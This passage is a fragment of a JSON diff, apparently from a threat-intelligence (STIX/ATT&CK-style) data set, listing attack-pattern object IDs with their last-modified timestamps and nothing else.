"attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "object_modified": "2023-09-29T21:06:03.098Z" + }, + { + "object_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "object_modified": "2023-07-24T18:53:10.860Z" + }, + { + "object_ref": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "object_modified": "2024-04-16T12:21:51.311Z" + }, + { + "object_ref": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "object_modified": "2024-04-13T14:47:31.204Z" + }, + { + "object_ref": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "object_modified": "2023-12-26T20:54:38.721Z" + }, + { + "object_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "object_modified": "2023-10-13T17:56:59.593Z" + }, + { + "object_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", + "object_modified": "2023-03-21T13:56:27.910Z" + }, + { + "object_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "object_modified": "2024-03-29T16:37:34.772Z" + }, + { + "object_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "object_modified": "2023-10-13T17:56:59.793Z" + }, + { + "object_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "object_modified": "2023-10-13T17:56:59.992Z" + }, + { + "object_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "object_modified": "2023-03-30T21:01:47.417Z" + }, + { + "object_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1c338d0f-a65e-4073-a5c1-c06878849f21", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "object_modified": "2023-10-13T17:57:00.184Z" + }, + { + "object_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "object_modified": "2023-09-14T21:12:48.409Z" + }, + { + "object_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "object_modified": "2024-04-08T18:57:58.010Z" + }, + { + "object_ref": "attack-pattern--1ce03c65-5946-4ac9-9d4d-66db87e024bd", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "object_modified": "2023-03-30T21:01:48.643Z" + }, + { + "object_ref": "attack-pattern--1df0326d-2fbc-4d08-a16b-48365f1e742d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "object_modified": "2024-04-16T12:26:07.945Z" + }, + { + "object_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1f47e2fd-fa77-4f2f-88ee-e85df308f125", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "object_modified": "2024-03-01T17:55:56.116Z" + }, + { + "object_ref": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", + "object_modified": "2023-06-14T23:03:51.540Z" + }, + { + "object_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--215190a9-9f02-4e83-bb5f-e0589965a302", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2169ba87-1146-4fc7-a118-12b72251db7e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "object_modified": "2024-04-15T21:33:57.732Z" + }, + { + "object_ref": "attack-pattern--22522668-ddf6-470b-a027-9d6866679f67", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "object_modified": "2024-03-29T17:45:48.126Z" + }, + { + "object_ref": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", + "object_modified": "2023-05-08T20:13:24.241Z" + }, + { + "object_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "object_modified": "2023-09-15T18:57:21.881Z" + }, + { + "object_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "object_modified": "2023-04-21T12:22:19.740Z" + }, + { + "object_ref": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "object_modified": "2023-05-31T12:33:20.915Z" + }, + { + "object_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "object_modified": "2024-04-19T04:27:51.388Z" + }, + { + "object_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "object_modified": "2023-10-13T17:57:00.378Z" + }, + { + "object_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "object_modified": "2023-12-26T20:58:19.356Z" + }, + { + "object_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "object_modified": "2024-01-11T23:47:44.655Z" + }, + { + "object_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "object_modified": "2023-10-13T17:57:00.575Z" + }, + { + "object_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "object_modified": "2023-10-13T17:57:00.768Z" + }, + { + "object_ref": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "object_modified": "2023-10-13T17:57:00.969Z" + }, + { + "object_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--27960489-4e7f-461d-a62a-f5c0cb521e4a", + "object_modified": "2023-11-02T15:39:10.534Z" + }, + { + "object_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "object_modified": "2023-10-13T17:57:01.165Z" + }, + { + "object_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "object_modified": "2023-10-13T17:57:01.367Z" + }, + { + "object_ref": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "object_modified": "2023-10-13T17:57:01.578Z" + }, + { + "object_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "object_modified": "2024-04-11T19:25:51.394Z" + }, + { + "object_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "object_modified": "2024-04-19T12:49:40.919Z" + }, + { + "object_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "object_modified": "2023-10-13T17:57:01.778Z" + }, + { + "object_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "object_modified": "2024-04-15T23:51:25.037Z" + }, + { + "object_ref": "attack-pattern--2ba5aa71-9d15-4b22-b726-56af06d9ad2f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "object_modified": "2023-10-13T17:57:01.994Z" + }, + { + "object_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "object_modified": "2023-10-13T17:57:02.197Z" + }, + { + "object_ref": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", + "object_modified": "2024-04-19T13:26:16.082Z" + }, + { + "object_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "object_modified": "2023-08-11T20:24:03.069Z" + }, + { + "object_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "object_modified": "2024-03-29T18:29:06.873Z" + }, + { + "object_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "object_modified": "2023-10-13T17:57:02.398Z" + }, + { + "object_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "object_modified": "2023-10-04T14:16:17.655Z" + }, + { + "object_ref": "attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2e114e45-2c50-404c-804a-3af9564d240e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "object_modified": "2024-01-31T14:09:27.066Z" + }, + { + "object_ref": "attack-pattern--2edd9d6a-5674-4326-a600-ba56de467286", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "object_modified": "2024-04-16T12:26:49.584Z" + }, + { + "object_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "object_modified": "2023-10-13T17:57:02.595Z" + }, + { + "object_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "object_modified": "2024-04-28T15:51:58.945Z" + }, + { + "object_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "object_modified": "2024-01-02T13:35:57.680Z" + }, + { + "object_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "object_modified": "2023-10-13T17:57:02.785Z" + }, + { + "object_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "object_modified": "2023-04-14T21:51:47.277Z" + }, + { + "object_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "object_modified": "2024-04-10T16:41:01.496Z" + }, + { + "object_ref": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9", + "object_modified": "2023-04-15T00:21:55.791Z" + }, + { + "object_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "object_modified": "2024-04-19T12:32:44.370Z" + }, + { + "object_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "object_modified": "2023-10-13T17:57:02.990Z" + }, + { + "object_ref": "attack-pattern--327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "object_modified": "2022-09-22T19:13:52.548Z" + }, + { + "object_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", + "object_modified": "2023-09-29T16:11:43.530Z" + }, + { + "object_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "object_modified": "2023-10-13T17:57:03.187Z" + }, + { + "object_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "object_modified": "2023-07-28T18:29:56.525Z" + }, + { + "object_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "object_modified": "2023-09-29T19:44:43.870Z" + }, + { + "object_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "object_modified": "2023-10-03T04:06:42.256Z" + }, + { + "object_ref": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "object_modified": "2023-10-13T17:57:03.395Z" + }, + { + "object_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "object_modified": "2024-01-17T22:52:23.454Z" + }, + { + "object_ref": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8", + "object_modified": "2024-04-28T15:44:25.342Z" + }, + { + "object_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", + "object_modified": "2023-10-16T17:51:35.865Z" + }, + { + "object_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "object_modified": "2024-03-01T15:29:46.832Z" + }, + { + "object_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "object_modified": "2023-03-30T21:01:41.052Z" + }, + { + "object_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "object_modified": "2023-10-13T17:57:03.589Z" + }, + { + "object_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", + "object_modified": "2024-03-01T19:06:05.126Z" + }, + { + "object_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "object_modified": "2023-10-13T17:57:03.783Z" + }, + { + "object_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "object_modified": "2024-04-18T23:22:37.874Z" + }, + { + "object_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "object_modified": "2023-10-13T16:01:07.538Z" + }, + { + "object_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "object_modified": "2023-09-08T18:05:28.311Z" + }, + { + "object_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "object_modified": "2021-06-07T19:23:33.039Z" + }, + { + "object_ref": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", + "object_modified": "2024-04-28T15:58:48.119Z" + }, + { + "object_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "object_modified": "2024-02-14T20:07:44.756Z" + }, + { + "object_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "object_modified": "2022-05-24T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "object_modified": "2023-10-13T17:57:03.989Z" + }, + { + "object_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "object_modified": "2023-10-17T20:42:21.453Z" + }, + { + "object_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "object_modified": "2023-08-14T19:28:18.334Z" + }, + { + "object_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "object_modified": "2023-10-20T16:43:53.391Z" + }, + { + "object_ref": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a", + "object_modified": "2022-10-21T14:21:57.991Z" + }, + { + "object_ref": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", + "object_modified": "2023-04-11T01:07:48.218Z" + }, + { + "object_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "object_modified": "2024-04-05T16:34:58.587Z" + }, + { + "object_ref": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e", + "object_modified": "2023-04-11T23:22:49.534Z" + }, + { + "object_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "object_modified": "2024-02-26T14:23:37.009Z" + }, + { + "object_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "object_modified": "2023-10-13T17:57:04.376Z" + }, + { + "object_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "object_modified": "2023-11-28T21:27:35.373Z" + }, + { + "object_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "object_modified": "2024-03-01T16:58:02.395Z" + }, + { + "object_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "object_modified": "2024-02-26T14:19:09.417Z" + }, + { + "object_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "object_modified": "2023-09-05T15:00:36.471Z" + }, + { + "object_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "object_modified": "2024-04-12T23:52:30.489Z" + }, + { + "object_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "object_modified": "2023-10-13T17:57:04.582Z" + }, + { + "object_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "object_modified": "2024-04-28T15:55:55.068Z" + }, + { + "object_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "object_modified": "2024-03-08T17:00:59.133Z" + }, + { + "object_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "object_modified": "2024-04-15T21:33:12.892Z" + }, + { + "object_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "object_modified": "2024-04-12T02:49:39.980Z" + }, + { + "object_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0", + "object_modified": "2022-05-11T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "object_modified": "2023-10-01T02:28:45.147Z" + }, + { + "object_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "object_modified": "2023-10-12T05:22:59.079Z" + }, + { + "object_ref": "attack-pattern--44dca04b-808d-46ca-b25f-d85236d4b9f8", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "object_modified": "2022-11-08T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", + "object_modified": "2023-10-27T18:32:11.219Z" + }, + { + "object_ref": "attack-pattern--4579d9c9-d5b9-45e0-9848-0104637b579f", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "object_modified": "2024-03-01T16:25:43.150Z" + }, + { + "object_ref": "attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--46944654-fcc1-4f63-9dad-628102376586", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--478aa214-2ca7-4ec0-9978-18798e514790", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "object_modified": "2021-04-29T14:49:39.188Z" + }, + { + "object_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "object_modified": "2024-02-09T18:49:08.428Z" + }, + { + "object_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "object_modified": "2023-10-13T17:57:04.784Z" + }, + { + "object_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "object_modified": "2023-10-05T11:35:30.887Z" + }, + { + "object_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "object_modified": "2023-11-06T20:14:51.609Z" + }, + { + "object_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "object_modified": "2024-04-19T12:42:18.632Z" + }, + { + "object_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "object_modified": "2023-05-09T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "object_modified": "2023-10-31T14:00:00.188Z" + }, + { + "object_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": 